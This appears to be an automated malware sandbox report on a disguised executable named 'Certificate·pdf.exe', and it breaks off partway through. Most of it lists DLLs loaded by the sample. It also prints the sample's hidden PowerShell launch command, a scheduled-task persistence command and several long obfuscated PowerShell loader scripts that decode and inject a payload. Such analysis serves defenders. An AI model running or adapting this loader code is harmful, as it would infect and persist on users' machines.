F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"			Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: oleacc.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: shfolder.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: riched20.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: usp10.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: msls31.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: msi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: shfolder.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: profapi.dll			Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: Certificate#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match

File source: 00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Complementing $rosiners4), (GDT @([Int32], [Int32], [Int32], [Int32], [Int32], [Int32]) ([Int32])))$Indfrselstolds = ([AppDomain]::CurrentDomain.GetAssemblies() | W
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skrmarbejdes8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skrmarbejdes9, $false).DefineType($rosiners

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 